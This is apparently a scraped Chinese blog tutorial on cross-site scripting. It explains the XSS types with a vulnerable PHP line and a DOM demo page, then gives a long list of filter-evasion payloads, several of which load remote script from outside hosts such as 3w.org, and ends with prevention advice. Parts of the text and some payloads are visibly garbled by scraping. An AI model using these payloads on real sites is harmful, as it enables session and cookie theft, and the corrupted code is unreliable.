这一次,完全理解XSS攻击

但愿读完本文你们完全理解XSS攻击,若是读完本文还不清楚,我请你吃饭慢慢告诉你~javascript

话很少说,咱们进入正题。php

1、简述

跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。所以,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。css

XSS攻击一般指的是经过利用网页开发时留下的漏洞,经过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序一般是JavaScript,但实际上也能够包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能获得包括但不限于更高的权限(如执行一些操做)、私密网页内容、会话和cookie等各类内容。html

2、XSS类型

最多见的几种分类:反射型(非持久型)XSS存储型(持久型)XSSDOM型XSS通用型XSS突变型XSS前端

反射型XSS

反射型XSS只是简单的把用户输入的数据从服务器反射给用户浏览器,要利用这个漏洞,攻击者必须以某种方式诱导用户访问一个精心设计的URL(恶意连接),才能实施攻击。java

举例来讲,当一个网站的代码中包含相似下面的语句:android

<?php echo "<p>hello,$_GET['user']</p>"; ?>

若是未作防范XSS,用户名设为<script>alert("Tz")</script>,则会执行预设好的JavaScript代码。git

漏洞成因

当用户的输入或者一些用户可控参数未经处理地输出到页面上,就容易产生XSS漏洞。主要场景有如下几种:web

  • 将不可信数据插入到HTML标签之间时;// 例如div, p, td;chrome

  • 将不可信数据插入到HTML属性里时;// 例如:<div width=$INPUT></div>

  • 将不可信数据插入到SCRIPT里时;// 例如:<script>var message = ” $INPUT “;</script>

  • 还有插入到Style属性里的状况,一样具备必定的危害性;// 例如<span style=” property : $INPUT ”></span>

  • 将不可信数据插入到HTML URL里时,// 例如:<a href=”[http://www.abcd.com?param=](http://www.ccc.com/?param=) $INPUT ”></a>

  • 使用富文本时,没有使用XSS规则引擎进行编码过滤。

对于以上的几个场景,若服务端或者前端没有作好防范措施,就会出现漏洞隐患。

攻击流程

反射型XSS一般出如今搜索等功能中,须要被攻击者点击对应的连接才能触发,且受到XSS Auditor(chrome内置的XSS保护)、NoScript等防护手段的影响较大,因此它的危害性较存储型要小。

存储型XSS

​ 存储型(或 HTML 注入型/持久型)XSS 攻击最常发生在由社区内容驱动的网站或 Web 邮件网站,不须要特制的连接来执行。黑客仅仅须要提交 XSS 漏洞利用代码(反射型XSS一般只在url中)到一个网站上其余用户可能访问的地方。这些地区多是博客评论,用户评论,留言板,聊天室,HTML 电子邮件,wikis,和其余的许多地方。一旦用户访问受感染的页,执行是自动的。

漏洞成因

​ 存储型XSS漏洞的成因与反射型的根源相似,不一样的是恶意代码会被保存在服务器中,致使其它用户(前端)和管理员(先后端)在访问资源时执行了恶意代码,用户访问服务器-跨站连接-返回跨站代码。

攻击流程

DOM型XSS

经过修改页面的DOM节点造成的XSS,称之为DOM Based XSS。

漏洞成因

DOM型XSS是基于DOM文档对象模型的。对于浏览器来讲,DOM文档就是一份XML文档,当有了这个标准的技术以后,经过JavaScript就能够轻松的访问DOM。当确认客户端代码中有DOM型XSS漏洞时,诱使(钓鱼)一名用户访问本身构造的URL,利用步骤和反射型很相似,可是惟一的区别就是,构造的URL参数不用发送到服务器端,能够达到绕过WAF、躲避服务端的检测效果。

攻击示例

<html>
    <head>
        <title>DOM Based XSS Demo</title>
        <script>
        function xsstest()
        {
        var str = document.getElementById("input").value;
        document.getElementById("output").innerHTML = "<img
        src='"+str+"'></img>";
        }
        </script>
    </head>
    <body>
    <div id="output"></div>
    <input type="text" id="input" size=50 value="" />
    <input type="button" value="submit" onclick="xsstest()" />
    </body>
</html>

在这段代码中,submit按钮的onclick事件调用了xsstest()函数。而在xsstest()中,修改了页面的DOM节点,经过innerHTML把一段用户数据看成HTML写入到页面中,形成了DOM Based XSS。

通用型XSS

通用型XSS,也叫作UXSS或者Universal XSS,全称Universal Cross-Site Scripting。

上面三种XSS攻击的是由于客户端或服务端的代码开发不严谨等问题而存在漏洞的目标网站或者应用程序。这些攻击的先决条件是访问页面存在漏洞,可是UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。

漏洞成因

Web浏览器是正在使用的最流行的应用程序之一,当一个新漏洞被发现的时候,无论本身利用仍是说报告给官方,而这个过程当中都有一段不小的时间,这一过程当中漏洞均可能被利用于UXSS。

不只是浏览器自己的漏洞,如今主流浏览器都支持扩展程序的安装,而众多的浏览器扩展程序可能致使带来更多的漏洞和安全问题。由于UXSS攻击不须要网站页面自己存在漏洞,同时可能访问其余安全无漏洞页面,使得UXSS成为XSS里危险和最具破坏性的攻击类型之一。

漏洞案例

IE6或火狐浏览器扩展程序Adobe Acrobat的漏洞

这是一个比较经典的例子。当使用扩展程序时致使错误,使得代码能够执行。这是一个在pdf阅读器中的bug,容许攻击者在客户端执行脚本。构造恶意页面,写入恶意脚本,并利用扩展程序打开pdf时运行代码。tefano Di Paola 和 Giorgio Fedon在一个在Mozilla Firefox浏览器Adobe Reader的插件中可利用的缺陷中第一个记录和描述的UXSS,Adobe插件经过一系列参数容许从外部数据源取数据进行文档表单的填充,若是没有正确的执行,将容许跨站脚本攻击。

案例详见: Acrobat插件中的UXSS报告

Flash Player UXSS 漏洞 – CVE-2011-2107

一个在2011年Flash Player插件(当时的全部版本)中的缺陷使得攻击者经过使用构造的.swf文件,能够访问Gmail设置和添加转发地址。所以攻击者能够收到任意一个被攻破的Gmail账号的全部邮件副本(发送的时候都会抄送份)。Adobe认可了该漏洞.

案例详见: Flash Player UXSS 漏洞 – CVE-2011-2107报告

移动设备也不例外,并且能够成为XSS攻击的目标。Chrome安卓版存在一个漏洞,容许攻击者将恶意代码注入到Chrome经过Intent对象加载的任意的web页面。

安卓版Chrome浏览器漏洞

案例详见: Issue 144813: Security: UXSS via com.android.browser.application_id Intent extra

突变型XSS

突变型XSS,也叫作mXSS或,全称Mutation-based Cross-Site-Scripting。(mutation,突变,来自遗传学的一个单词,你们都知道的基因突变,gene mutation)

漏洞成因

然而,若是用户所提供的富文本内容经过javascript代码进入innerHTML属性后,一些意外的变化会使得这个认定再也不成立:浏览器的渲染引擎会将原本没有任何危害的HTML代码渲染成具备潜在危险的XSS攻击代码。

随后,该段攻击代码,可能会被JS代码中的其它一些流程输出到DOM中或是其它方式被再次渲染,从而致使XSS的执行。 这种因为HTML内容进入innerHTML后发生意外变化,而最终致使XSS的攻击流程。

攻击流程

​ 将拼接的内容置于innerHTML这种操做,在如今的WEB应用代码中十分常见,常见的WEB应用中不少都使用了innerHTML属性,这将会致使潜在的mXSS攻击。从浏览器角度来说,mXSS对三大主流浏览器(IE,CHROME,FIREFOX)均有影响。

mXSS种类

目前为止已知的mXSS种类,接下来的部分将分别对这几类进行讨论与说明。

  • 反引号打破属性边界致使的 mXSS;(该类型是最先被发现并利用的一类mXSS,于2007年被提出,随后被有效的修复)

  • 未知元素中的xmlns属性所致使的mXSS;(一些浏览器不支持HTML5的标记,例如IE8,会将article,aside,menu等看成是未知的HTML标签。)

  • CSS中反斜线转义致使的mXSS;(在CSS中,容许用\来对字符进行转义,例如:property: 'v\61 lue' 表示 property:'value',其中61是字母a的ascii码(16进制)。\后也能够接unicode,例如:\20AC 表示 € 。正常状况下,这种转义不会有问题。可是碰上innerHTML后,一些奇妙的事情就会发生。)

  • CSS中双引号实体或转义致使的mXSS;(接着上一部分,依然是CSS中所存在的问题,&quot; &#x22; &#34; 等双引号的表示形式都可致使这类问题,)

  • CSS属性名中的转义所致使的mXSS;

  • 非HTML文档中的实体突变;

  • HTML文档中的非HTML上下文的实体突变;

3、XSS攻击代码出现的场景

  • 普通的XSS JavaScript注入,示例以下:

    <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  • IMG标签XSS使用JavaScript命令,示例以下:

    <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  • IMG标签无分号无引号,示例以下:

    <IMG SRC=javascript:alert(‘XSS’)>
  • IMG标签大小写不敏感,示例以下:

    <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  • HTML编码(必须有分号),示例以下:

    <IMG SRC=javascript:alert(“XSS”)>
  • 修正缺陷IMG标签,示例以下:

    <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
  • formCharCode标签,示例以下:

    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  • UTF-8的Unicode编码,示例以下:

    <IMG SRC=jav..省略..S')>
  • 7位的UTF-8的Unicode编码是没有分号的,示例以下:

    <IMG SRC=jav..省略..S')>
  • 十六进制编码也是没有分号,示例以下:

    <IMG SRC=\'#\'" /span>
  • 嵌入式标签,将Javascript分开,示例以下:

    <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  • 嵌入式编码标签,将Javascript分开,示例以下:

    <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  • 嵌入式换行符,示例以下:

    <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  • 嵌入式回车,示例以下:

    <IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  • 嵌入式多行注入JavaScript,这是XSS极端的例子,示例以下:

    <IMG SRC=\'#\'" /span>
  • 解决限制字符(要求同页面),示例以下:

    <script>z=z+ ’write(“‘</script>
    
          <script>z=z+ ’<script’</script>
    
          <script>z=z+ ’ src=ht’</script>
    
          <script>z=z+ ’tp://ww’</script>
    
          <script>z=z+ ’w.shell’</script>
    
          <script>z=z+ ’.net/1.’</script>
    
          <script>z=z+ ’js></sc’</script>
    
          <script>z=z+ ’ript>”)’</script>
    
          <script>eval_r(z)</script>
  • 空字符,示例以下:

    perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
  • 空字符2,空字符在国内基本没效果.由于没有地方能够利用,示例以下:

    perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
  • Spaces和meta前的IMG标签,示例以下:

    <IMG SRC=\'#\'"  
    
    javascript:alert(‘XSS’);”>
  • Non-alpha-non-digit XSS,示例以下:

    <SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
  • Non-alpha-non-digit XSS to 2,示例以下:

    <BODY onload!#$%&()*~+ -_.,:;?@[/|\]^`=alert(“XSS”)>
  • Non-alpha-non-digit XSS to 3,示例以下:

    <SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
  • 双开括号,示例以下:

    <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  • 无结束脚本标记(仅火狐等浏览器),示例以下:

    <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
  • 无结束脚本标记2,示例以下:

    <SCRIPT SRC=//3w.org/XSS/xss.js>
  • 半开的HTML/JavaScript XSS,示例以下:

    <IMG SRC=\'#\'" /span>
  • 双开角括号,示例以下:

    <iframe src=http://3w.org/XSS.html <
  • 无单引号 双引号 分号,示例以下:

    <SCRIPT>a=/XSS/
    alert(a.source)</SCRIPT>
  • 换码过滤的JavaScript,示例以下:

    \”;alert(‘XSS’);//
  • 结束Title标签,示例以下:

    </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
  • Input Image,示例以下:

    <INPUT SRC=\'#\'" /span>
  • BODY Image,示例以下:

    <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  • BODY标签,示例以下:

    <BODY(‘XSS’)>
  • IMG Dynsrc,示例以下:

    <IMG DYNSRC=\'#\'" /span>
  • IMG Lowsrc,示例以下:

    <IMG LOWSRC=\'#\'" /span>
  • BGSOUND,示例以下:

    <BGSOUND SRC=\'#\'" /span>
  • STYLE sheet,示例以下:

    <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
  • 远程样式表,示例以下:

    <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
  • List-style-image(列表式),示例以下:

    <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
  • IMG VBscript,示例以下:

    <IMG SRC=\'#\'" /STYLE><UL><LI>XSS
  • META连接url,示例以下:

    <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
  • Iframe,示例以下:

    <IFRAME SRC=\'#\'" /IFRAME>
  • Frame,示例以下:

    <FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
  • Table,示例以下:

    <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
  • TD,示例以下:

    <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
  • DIV background-image,示例以下:

    <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  • DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279),示例以下:

    <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  • DIV expression,示例以下:

    <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
  • STYLE属性分拆表达,示例以下:

    <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
  • 匿名STYLE(组成:开角号和一个字母开头),示例以下:

    <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
  • STYLE background-image,示例以下:

    <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
  • IMG STYLE方式,示例以下:

    exppression(alert(“XSS”))’>
  • STYLE background,示例以下:

    <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
  • BASE,示例以下:

    <BASE HREF=”javascript:alert(‘XSS’);//”>

4、XSS 攻击的预防

网上防范XSS攻击的方法一搜就一大堆,可是不管方法有多少,始终是万变不离其宗。

XSS 攻击有两大要素: 1. 攻击者提交恶意代码。 2. 浏览器执行恶意代码。

1.预防 DOM 型 XSS 攻击

DOM 型 XSS 攻击,实际上就是网站前端 JavaScript 代码自己不够严谨,把不可信的数据看成代码执行了。

在使用 .innerHTML、.outerHTML、document.write() 时要特别当心,不要把不可信的数据做为 HTML 插到页面上,而应尽可能使用 .textContent、.setAttribute() 等。

DOM 中的内联事件监听器,如 location、onclick、onerror、onload、onmouseover 等, 标签的href属性,JavaScript 的eval()、setTimeout()、setInterval()等,都能把字符串做为代码运行。若是不可信的数据拼接到字符串中传递给这些 API,很容易 产生安全隐患,请务必避免。

2.输入过滤

若是由前端过滤输入,而后提交到后端的话。一旦攻击者绕过前端过滤,直接构造请求,就能够提交恶意代码了。

那么,换一个过滤时机:后端在写入数据库前,对输入进行过滤,而后把“安全的”内容,返回给前端。这样是否可行呢? 咱们举一个例子,一个正常的用户输入了 5 < 7 这个内容,在写入数据库前,被转义,变成了 5 $lt; 7。 问题是:在提交阶段,咱们并不肯定内容要输出到哪里。

这里的“并不肯定内容要输出到哪里”有两层含义:

  1. 用户的输入内容可能同时提供给前端和客户端,而一旦通过了 escapeHTML(),客户端显示的内容就变成了乱码( 5 $lt;7 )。
  2. 在前端中,不一样的位置所需的编码也不一样。 当 5 $lt;7 做为 HTML 拼接页面时,能够正常显示:5 < 7

因此输入过滤非彻底可靠,咱们就要经过“防止浏览器执行恶意代码”来防范 XSS,可采用下面的两种方法

3.前端渲染把代码和数据分隔开

在前端渲染中,咱们会明确的告诉浏览器:下面要设置的内容是文本(.innerText),仍是属性(.setAttribute),仍是样式 (.style)等等。浏览器不会被轻易的被欺骗,执行预期外的代码了。

  • Javascript:可使用textContent或者innerText的地方,尽可能不使用innerHTML;

  • query:可使用text()得地方,尽可能不使用html();

4.拼接HTML时对其进行转义

若是拼接 HTML 是必要的,就须要采用合适的转义库,对 HTML 模板各处插入点进行充分的转义。

经常使用的模板引擎,如 doT.js、ejs、FreeMarker 等,对于 HTML 转义一般只有一个规则,就是把 & < > " ' / 这几个字符转义掉,确 实能起到必定的 XSS 防御做用,但并不完善:

这里推荐一个前端防止XSS攻击的插件: js-xss,Git 3.8K 的Star和60W的周下载量证实了其强大性.

5、总结

防范 XSS 是不仅是服务端的任务,须要后端和前端共同参与的系统工程。虽然很难经过技术手段彻底避免XSS,但咱们原则上减小漏洞的产生。

参考资源

结尾

若有疑问,可在下方留言,会第一时间进行回复!

谢谢你愿意花时间阅读这篇文章,但愿能够对你有所帮助!

我曾踏足山巅,也曾跌落谷底,二者都让我受益良多。我的网站:zhaohongcheng.com

相关文章
相关标签/搜索